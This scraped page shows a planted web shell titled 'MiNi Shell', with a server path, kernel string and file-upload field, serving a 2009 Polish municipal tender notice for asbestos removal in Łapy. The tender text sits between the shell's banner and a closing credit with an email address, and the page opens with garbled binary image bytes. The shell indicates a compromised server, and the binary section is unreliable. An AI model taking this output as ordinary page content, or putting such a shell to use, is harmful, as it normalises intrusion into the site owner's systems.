JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090605/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090605/89119-N-2009.html

<p class="kh_header"><b>Łapy: USUWANIE AZBESTU - DEMONTAŻ, TRANSPORT 
I UTYLIZACJA MATERIAŁÓW ZAWIERAJĄCYCH AZBEST 
Z TERENU GMINY ŁAPY</b><br>
<b>Numer ogłoszenia: 89119 - 2009; data zamieszczenia: 05.06.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Łapach , ul. gen. Wł. Sikorskiego 24, 18-100 Łapy, woj. podlaskie, tel. 085 7152251, faks 085 7152256.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lapy.podlasie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USUWANIE AZBESTU - DEMONTAŻ, TRANSPORT 
I UTYLIZACJA MATERIAŁÓW ZAWIERAJĄCYCH AZBEST 
Z TERENU GMINY ŁAPY.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa usunięcia azbestu - demontaż, transport 
i utylizacja materiałów zawierających azbest z terenu gminy Łapy w następującym zakresie: 

a)	demontaż około 3500 m2 płyt falistych azbestowo cementowych z dachów budynków mieszkalnych jednorodzinnych, budynków gospodarczych, garażów, wiat magazynowych:
-	dokładna ilość zdemontowanych materiałów zawierających azbest zostanie wskazana w obmiarze robót,
-	potwierdzeniem  wykonania prac polegających na demontażu będzie protokół odbioru robót podpisany przez przedstawiciela Zamawiającego, właściciela budynku oraz Wykonawcę - po zakończeniu prac na danej posesji, potwierdzający ilość zdemontowanego pokrycia dachu zawierającego azbest.
b)	transport (w tym załadunek) około 69,200 Mg odpadów zawierających azbest na składowisko odpadów niebezpiecznych lub na wydzielone części składowisk obojętnych lub innych niż niebezpieczne i obojętne,
c)	utylizacja około 69,200 Mg odpadów na składowisku odpadów niebezpiecznych lub na wydzielonej części składowisk obojętnych lub innych niż niebezpieczne i obojętne
-	potwierdzeniem utylizacji odpadów niebezpiecznych zawierających azbest pochodzących z danej posesji będzie dostarczenie Zamawiającemu i właścicielowi posesji oryginału Karty przekazania odpadów zgodnej z Rozporządzeniem Ministra Środowiska z 14 lutego 2006 r. w sprawie wzorów dokumentów stosowanych na potrzeby ewidencji odpadów (Dz. U. z 2006 r. nr 30, poz. 213).

Wykaz budynków i budowli będących przedmiotem postępowania znajduje się w załączniku nr 1 do SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.65.00.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 5.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W przetargu mogą wziąć udział Wykonawcy, którzy spełniają warunki ogólne i szczegółowe:

Warunki ogólne 

1.Spełnią warunki wynikające z art. 22 ust. 1 ustawy:

a.Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli 
  ustawy nakładają obowiązek posiadania takich uprawnień.
b.Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem
  technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią 
  pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego 
  i osób zdolnych do wykonania zamówienia. 
c.Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
  zamówienia.
d.Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podst. art.
  24 Pzp.
2.Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą 
   wykazać, że warunek określony w pkt 1 lit. d spełnia każdy z Wykonawców, 
   natomiast warunki określone w pkt 1 lit, a, b, c spełniają łącznie wszyscy 
   Wykonawcy.

Warunki szczegółowe

1.Doświadczenie
Wykonawca musi wykazać, że w okresie ostatnich 3 latach od dnia składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie zrealizował zamówienia na usługi o złożoności i wartości porównywalnej z przedmiotem niniejszego zamówienia to jest zrealizował minimum 2 usługi związane z usuwaniem azbestu (demontaż, transport i utylizacja materiałów zawierających azbest z dachów budynków mieszkalnych, budynków gospodarczych o powierzchni łącznie minimum
 2 000 m2).

2.Potencjał kadrowy
Wykonawca opracuje wykaz osób, którymi dysponuje lub będzie dysponował i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych i uprawnień do wykonania przedmiotu zamówienia posiadających doświadczenie i wykształcenie niezbędne do wykonania zamówienia, z podaniem także zakresu wykonywanych przez nie czynności lub pisemnego zobowiązania innych podmiotów do udostępniania osób zdolnych do wykonania zamówienia, jeżeli w wykazie o którym mowa wykonawca wskazał osoby, którymi będzie dysponował. Osoby te powinny posiadać odpowiednie kwalifikacje i uprawnienia do wykonania przedmiotu zamówienia zgodnie z Rozporządzeniem Ministra Gospodarki i Pracy w sprawie zasad bezpieczeństwa i higieny pracy przy zabezpieczaniu i usuwaniu wyrobów zawierających azbest oraz programu szkolenia w zakresie bezpiecznego użytkowania takich wyrobów Dz. U. z 2005 r. Nr 216, poz. 1824), Do informacji powinny być dołączone: kopie odpowiednich kwalifikacji - załącznik nr 5 (Potencjał kadrowy).

3.	Potencjał ekonomiczno-finansowy

Wykonawca wykaże, że:
a)dysponuje środkami finansowymi (dopuszczalne jest tu wskazanie środków z 
  kredytu obrotowego lub innego o ile środki te nie są przeznaczone na zrealizowanie 
  konkretnego celu) lub zdolność kredytową nie mniejszą niż 50 000 zł (słownie: 
  pięćdziesiąt tysięcy złotych).
b)posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej 
  działalności z godnie z przedmiotem niniejszego zamówienia o wartości co najmniej 
  25 000 zł (słownie: dwadzieścia pięć tysięcy złotych)

Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać (w zakresie warunków szczegółowych), że warunki określone w pkt 1, 2, 3 spełniają łącznie.

Sposób dokonywania oceny spełniania warunków udziału w postępowaniu.
a.Ocena spełniania warunków wymaganych od Wykonawcy zostanie dokonana wg formuły: spełnia - nie spełnia.
b.W toku oceny spełniania warunków udziału w postępowaniu, Zamawiający, o ile zajdzie taka potrzeba:
- wezwie Wykonawców, którzy w określonym terminie nie złożyli wymaganych przez Zamawiającego oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1, lub, którzy nie złożyli pełnomocnictw, albo, którzy złożyli wymagane przez Zamawiającego  oświadczenia i dokumenty, o których mowa w art. 25 ust. 1, zawierające błędy lub, którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie chyba, że mimo ich złożenia oferta Wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane roboty wymagań określonych przez Zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert;
- wezwie Wykonawców, w wyznaczonym przez siebie terminie, do złożenia wyjaśnień 
  dotyczących oświadczeń lub dokumentów, o których mowa w art. 25 ust 1 ustawy 
  Pzp.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.  Na potwierdzenie spełniania warunków udziału w postępowaniu należy załączyć:

a) Oświadczenie Wykonawcy o spełnianiu warunków określonych w art. 22 ust. 1 pkt 1 - 4 ustawy Pzp - zał. nr 4 do oferty.
2. Na potwierdzenie, że Wykonawca posiada uprawnienie do wykonywania określonej 
   działalności lub czynności oraz nie podlega wykluczeniu z postępowania należy
   załączyć:
a) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do
   ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do 
   rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie 
   wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
b) Aktualne zezwolenia na transport odpadów zawierających azbest.
c) Aktualnej umowy na odbiór odpadów zawierających azbest z podmiotem 
   prowadzącym działalność w zakresie unieszkodliwiania tych odpadów lub
   zezwolenie na prowadzenie takiej działalności.
d) Opracowany program gospodarki odpadami zawierającymi azbest (powyżej 1 
    Mg)rok i zatwierdzony przez właściwego marszałka województwa lub starostę. 
e) Zaświadczenie przeszkolenia przez uprawnioną instytucję zatrudnianych 
   pracowników i osób kierujących lub nadzorujących, w zakresie bezpieczeństwa i 
   higieny pracy przy zabezpieczaniu i usuwaniu tych wyrobów oraz w zakresie 
   przestrzegania procedur dotyczących bezpiecznego postępowania z wyrobami 
   zawierającymi azbest.
3. Na potwierdzenie warunku posiadania przez wykonawcę niezbędnej wiedzy i 
   doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do
   wykonania zamówienia należy załączyć:
a) Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą 
   uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich 
   kwalifikacji zawodowych i uprawnień do wykonania przedmiotu zamówienia 
   posiadających doświadczenie i wykształcenie niezbędne do wykonania zamówienia,
   z podaniem także zakresu wykonywanych przez nie czynności lub pisemnego 
   zobowiązania innych podmiotów do udostępniania osób zdolnych do wykonania 
   zamówienia, jeżeli w wykazie o którym mowa wykonawca wskazał osoby, którymi
   będzie dysponował. Do informacji powinny być dołączone: kopie odpowiednich 
   kwalifikacji - załącznik nr 5 (Potencjał kadrowy).
b) Wykaz wykonanych 2 usług, w przypadku świadczeń okresowych lub ciągłych 
    również  wykonywanych usług w okresie ostatnich 2 lat przed dniem rozpoczęcia
    postępowania o udzielenie zamówienia a jeżeli okres prowadzenia działalności jest
    krótszy, co najmniej 3 zamówień odpowiadających swoim rodzajem przedmiotowi
    zamówienia, z podaniem przedmiotu, daty wykonania i odbiorców. Do informacji 
   powinny być dołączone referencje należytego wykonania robót - załącznik nr 6 
  (Doświadczenie zawodowe).
4. Na potwierdzenie warunku znajdowania się przez wykonawcę w sytuacji 
    ekonomicznej i finansowej zapewniającej wykonanie zamówienia należy załączyć:
a) Informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym 
   Wykonawca posiada rachunek bankowy, potwierdzającej wysokość środków 
   finansowych lub zdolność kredytową Wykonawcy nie mniejszą niż 50 000,00 zł.
   Powyższe dokumenty muszą być wystawione nie wcześniej niż 3 miesiące przed 
   upływem terminu składania ofert.
b) Polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca 
   jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej 
  działalności gospodarczej, w tym działalności zgodnej z przedmiotem niniejszego 
  zamówienia o wartości co najmniej 25 000,00 zł.
5. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium 
   Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 2 składa 
   dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce
   zamieszkania, potwierdzające odpowiednio, że:
- nie otwarto jego likwidacji ani nie ogłoszono upadłości - dokumenty powinny być 
   wystawione nie wcześniej niż 6 miesięcy przed terminem składania ofert
- nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i 
   zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub 
   rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji 
   właściwego organu - dokumenty powinny być wystawione nie wcześniej niż 3 
   miesięcy przed terminem składania ofert
- nie orzeczono wobec niego zakazu ubiegania się o zamówienie - dokumenty 
   powinny być wystawione nie wcześniej niż 6 miesięcy przed terminem składania 
   ofert
6. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę
    lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 2 
    zastępuje się je dokumentem zawierającym oświadczenie złożone przed
    notariuszem, właściwym organem sądowym, administracyjnym albo organem 
    samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby 
    lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, wystawione
    nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
7. Zasady składania oferty przez podmioty występujące wspólnie:
a) Oferta musi być podpisana przez wszystkie podmioty lub pełnomocnika.
b) Wymagane oświadczenia lub dokumenty wskazane w pkt. 1a oraz pkt. 2 a, b, c, d, - powinny być złożone przez każdy podmiot.
8. Dokumenty należy składać w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.lapy.podlasie.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski Łapy, 18-100 Łapy, ul Gen. Wł. Sikorskiego 24.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.06.2009 godzina 14:00, miejsce: 1.Oferty powinny być złożone w siedzibie Zamawiającego w Łapach przy ul. Gen. Wł. Sikorskiego 24, sekretariat - pok.103.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com